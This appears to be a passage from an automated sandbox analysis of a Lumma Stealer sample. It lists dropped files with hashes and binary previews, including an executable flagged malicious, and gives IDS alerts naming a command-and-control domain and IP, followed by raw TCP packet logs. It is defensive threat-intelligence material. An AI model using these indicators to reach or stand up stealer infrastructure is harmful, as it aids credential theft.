                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ni4nz3ke.o2y.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\BIT2853.tmp

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):1527814
                              Entropy (8bit):7.997329416439085
                              Encrypted:true
                              SSDEEP:24576:qytEI+7yp9uF1/WztSxaCdN28SdKriek4qcYjjBiiJWn8HBgvLGTrFX:qpI8Yk1/WBSkWN32KrzJq0ii8hgvLG1X
                              MD5:BB9EB573EAE8B10C74BCBFF43C81D5DB
                              SHA1:79D70041A7410F018169C265307E7E73515EDBB8
                              SHA-256:793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
                              SHA-512:68E228C1DA9ADD467D3C3C354D9BF21C8387869A02647A8DC440FABC223294B354FA437E66A330A5CCBCC20E3614FCAD0BE595382BBE4FD88CABEFAC83F2F0E9
                              Malicious:false
                              Preview:PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~*C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<|.b..c.p.S4o..*.5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....

                              C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):2881672
                              Entropy (8bit):6.8419429623745796
                              Encrypted:false
                              SSDEEP:49152:MBjwz++TjZgdXCs6xTqVRoITZE87wajH/Qc9d1OF:yoz37p805cVO
                              MD5:80C2A36E9A14E3EDBA0B706D2433D9B8
                              SHA1:03AC191B235B3A867539720070A5E6CA1108B4F2
                              SHA-256:154DAE39845ABEF889AF814BD6AD84283374C90ECECE891ADDC362384AFDD882
                              SHA-512:AC030656796130A3949E66F537044A27630C43B5827DD252CFAB9C215E1B51DDD279F6F82911B1C728B19AC110B0A41D8D5CCEF32FEE97E07407B77B89728C8B
                              Malicious:true
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......g..Y#...#...#...^...'...^.........4.>...........*.o."...e...'.......d...*.h.+...*.x.8...#.......^.........0."...#.|."...^.5."...Rich#...........................PE..L......]..........#..........<.......#....... ....@..........................P,.......,..................................................8............+..:...........'..8............................s..@............ ..p............................text...;........................... ..`.rdata...... ......................@..@.data....K..........................@....rsrc....8.......8..................@..@................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\yANrdNKT.zip (copy)

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):1527814
                              Entropy (8bit):7.997329416439085
                              Encrypted:true
                              SSDEEP:24576:qytEI+7yp9uF1/WztSxaCdN28SdKriek4qcYjjBiiJWn8HBgvLGTrFX:qpI8Yk1/WBSkWN32KrzJq0ii8hgvLG1X
                              MD5:BB9EB573EAE8B10C74BCBFF43C81D5DB
                              SHA1:79D70041A7410F018169C265307E7E73515EDBB8
                              SHA-256:793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
                              SHA-512:68E228C1DA9ADD467D3C3C354D9BF21C8387869A02647A8DC440FABC223294B354FA437E66A330A5CCBCC20E3614FCAD0BE595382BBE4FD88CABEFAC83F2F0E9
                              Malicious:false
                              Preview:PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~*C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<|.b..c.p.S4o..*.5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....

                              C:\Windows\appcompat\Programs\Amcache.hve

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.46604440896113
                              Encrypted:false
                              SSDEEP:6144:AIXfpi67eLPU9skLmb0b4YWSPKaJG8nAgejZMMhA2gX4WABl0uNQdwBCswSb/:FXD94YWlLZMM6YFH6+/
                              MD5:3AD1381DB551FF94A284F5577A9FFD46
                              SHA1:6901AD5E24141C9124CA442E97EF2883D45A1319
                              SHA-256:711933BFA5C5D5A8B4B847E1CD7746DDB44C7D841208F77F82D60FDE2A0570E6
                              SHA-512:10D5D75872C6D07155CBB640F2877D31114093F66C1466F96C1FA6A30DECC9B858072E8EBF16928FD4AF102BC112B9F3A80436ED6CE59C93CD8C432E96BDFA55
                              Malicious:false
                              Preview:regf8...8....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm6.YL+................................................................................................................................................................................................................................................................................................................................................zNx........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              No static file info

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-26T17:46:47.842585+02002056078ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)1192.168.2.4505461.1.1.153UDP
                              2024-09-26T17:46:48.357475+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.449744172.67.206.221443TCP
                              2024-09-26T17:46:48.562552+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449744172.67.206.221443TCP
                              2024-09-26T17:46:48.562552+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744172.67.206.221443TCP
                              2024-09-26T17:46:49.125919+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.449745172.67.206.221443TCP
                              2024-09-26T17:46:49.598721+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449745172.67.206.221443TCP
                              2024-09-26T17:46:49.598721+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745172.67.206.221443TCP
                              2024-09-26T17:46:58.843588+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.449748172.67.206.221443TCP
                              2024-09-26T17:46:59.100244+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449748172.67.206.221443TCP
                              2024-09-26T17:46:59.100244+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748172.67.206.221443TCP
                              2024-09-26T17:46:59.804866+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.449749172.67.206.221443TCP
                              2024-09-26T17:47:00.280736+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449749172.67.206.221443TCP
                              2024-09-26T17:47:00.280736+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749172.67.206.221443TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 26, 2024 17:46:26.133271933 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:26.133320093 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:26.133402109 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:26.148433924 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:26.148463011 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:26.874216080 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:26.874294043 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:26.880234003 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:26.880258083 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:26.880548000 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:26.897711039 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:26.943399906 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:27.205738068 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:27.205805063 CEST44349730185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:27.205977917 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:27.835746050 CEST49730443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:32.781773090 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:32.781814098 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:32.781892061 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:32.783739090 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:32.783752918 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.475622892 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.475719929 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.477072001 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.477085114 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.477652073 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.511109114 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.551407099 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.798062086 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.798208952 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.798288107 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.798314095 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.798335075 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.798351049 CEST49734443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.798356056 CEST44349734185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.836759090 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.836812973 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:33.837129116 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.837359905 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:33.837376118 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.543016911 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.543791056 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:34.543843985 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.544644117 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:34.544651031 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.869179010 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.869215012 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.869375944 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:34.869402885 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.913038969 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:34.985510111 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.985527992 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.985595942 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:34.985647917 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:34.986011028 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.986077070 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:34.986228943 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:34.986290932 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.029356956 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.029449940 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.099680901 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.099776983 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.099976063 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.100044012 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.100096941 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.100152969 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.101902008 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.101982117 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.102020025 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.102077007 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.102931976 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.102996111 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.144184113 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.144263029 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.149956942 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.150059938 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.214416027 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.214519024 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.214528084 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.214541912 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.214590073 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.214721918 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.214787960 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.215585947 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.215657949 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.216135025 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.216193914 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.216408014 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.216454983 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.217120886 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.217180014 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.218302011 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.218374014 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.218509912 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.218571901 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.234797001 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.234884024 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.235363007 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.235424995 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.240596056 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.240664959 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.260103941 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.260162115 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.260413885 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.260471106 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.304991961 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.305056095 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.305497885 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.305546045 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.339267015 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.339334011 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.339750051 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.339807034 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.340004921 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.340058088 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.340451956 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.340521097 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.340826988 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.340882063 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.341190100 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.341250896 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.341514111 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.341562986 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.341583967 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.341865063 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.341924906 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.341924906 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.342097044 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.342154980 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.342698097 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.342760086 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.343019009 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.343069077 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.343074083 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.343086004 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.343125105 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.343738079 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.343789101 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.350740910 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.350806952 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.351269960 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.351325989 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.395751953 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.395914078 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.396351099 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.396401882 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.396428108 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.396436930 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.396464109 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.396481037 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.430628061 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.430736065 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.430793047 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.430847883 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.431178093 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.431225061 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.431437969 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.431484938 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.431499004 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.431508064 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.431545019 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.432008028 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.432069063 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.432267904 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.432446957 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.432652950 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.432718992 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.435709000 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.435786963 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.435931921 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.435987949 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.436160088 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.436214924 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.441621065 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.441703081 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.441833973 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.441889048 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.486303091 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.486397028 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.486752987 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.486820936 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.486989975 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.487052917 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.521199942 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.521315098 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.521512032 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.521574974 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.521709919 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.521766901 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.521861076 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.521914005 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.522253036 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.522316933 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.522506952 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.522557974 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.522861958 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.522917032 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.523050070 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.523091078 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.523103952 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.523113966 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.523147106 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.523171902 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.523688078 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.523749113 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.523942947 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.524008989 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.532185078 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.532259941 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.532442093 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.532505989 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.577687979 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.577755928 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.577800989 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.577815056 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.577832937 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.577862978 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.578130960 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.578198910 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.611696959 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.611867905 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.611931086 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.611999989 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.612273932 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.612349987 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.612406015 CEST44349735185.255.122.133192.168.2.4
                              Sep 26, 2024 17:46:35.612463951 CEST49735443192.168.2.4185.255.122.133
                              Sep 26, 2024 17:46:35.613837957 CEST44349735185.255.122.133192.168.2.4
